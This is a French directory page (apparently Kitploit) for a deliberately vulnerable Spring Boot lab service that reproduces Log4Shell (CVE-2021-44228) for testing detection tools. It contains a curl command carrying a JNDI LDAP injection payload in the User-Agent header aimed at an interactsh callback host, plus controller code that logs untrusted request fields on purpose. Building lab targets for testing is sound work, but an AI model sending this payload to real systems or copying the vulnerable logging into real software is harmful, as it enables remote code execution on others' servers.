Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service — Service Spring Boot dockerisé volontairement vulnérable à Log4Shell (CVE-2021-44228) pour tester les outils de détection, les payloads et les capacités d'exploitation dans un environnement local. | Kitploit
Outils/GitHubGitHub/zsolt-halo/log4j-log4shell-cve-2021-44228-spring-boot-test-service
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubzsolt-halo/log4j-log4shell-cve-2021-44228-spring-boot-test-service

Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service

Service Spring Boot dockerisé volontairement vulnérable à Log4Shell (CVE-2021-44228) pour tester les outils de détection, les payloads et les capacités d'exploitation dans un environnement local.

Voir le dépôt
1324il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-44228 Service de test Spring Boot

Ceci est un projet spring boot hello world bricolé pour tester vos outils/payloads/capacités de détection en local avant de les utiliser sur des cibles en production.

La version de Log4j configurée est la 2.13.0

Construction de l'image docker

bash build.sh

Exécution de l'image docker

docker run -p 8080:8080 dwdi/log4shell

Test / Déclenchement de CVE-2021-44228

Si vous n'avez pas burp collaborator qui tourne dans le garage, vous pouvez visiter ce site pour une expérience similaire : https://interactsh.com

curl -s --max-time 20 localhost:8080 -H 'User-Agent: ${jndi:ldap://<some_custom_identifier>.<your_generated_subdomain>.interactsh.com/a}' > /dev/null

Outil de scan

Optionnellement, vous pouvez utiliser ce superbe dépôt pour effectuer des scans locaux/massifs : https://github.com/adilsoybali/Log4j-RCE-Scanner

Emplacements de déclenchement

Cette vulnérabilité consiste à forcer une valeur contrôlée par l'utilisateur à être journalisée par le framework de journalisation vulnérable. Dans cette optique, cette simple application factice prend en charge deux verbes HTTP (GET/PUT) et un ensemble d'emplacements d'injection :

@GetMapping("/")
	public String index(HttpServletRequest request) {
		logger.info("Request URL: " + request.getRequestURL());
		logger.info("Request URI: " + request.getRequestURI());
		logger.info("Request Method: " + request.getMethod());
		logger.info("Request Query String: " + request.getQueryString());
		logger.info("Request Protocol: " + request.getProtocol());
		logger.info("Request Remote Address: " + request.getRemoteAddr());
		logger.info("Request Remote Host: " + request.getRemoteHost());
		logger.info("Request Remote Port: " + request.getRemotePort());
		logger.info("Request User Agent: " + request.getHeader("User-Agent"));
		return "Log4J2 is working!";
	}
@PostMapping("/")
	public String post(HttpServletRequest request, @RequestBody String body) {
		logger.info("Request URL: " + request.getRequestURL());
		logger.info("Request URI: " + request.getRequestURI());
		logger.info("Request Method: " + request.getMethod());
		logger.info("Request Query String: " + request.getQueryString());
		logger.info("Request Protocol: " + request.getProtocol());
		logger.info("Request Remote Address: " + request.getRemoteAddr());
		logger.info("Request Remote Host: " + request.getRemoteHost());
		logger.info("Request Remote Port: " + request.getRemotePort());
		logger.info("Request User Agent: " + request.getHeader("User-Agent"));
		logger.info("Request Body: " + body); // mind the extra request body
		return "Log4J2 is working!";
	}

Les contributions / améliorations sont les bienvenues.

Désolé pour la qualité du code :) ce projet n'est pas destiné à épater, mais à partager/aider.

Télécharger l’outil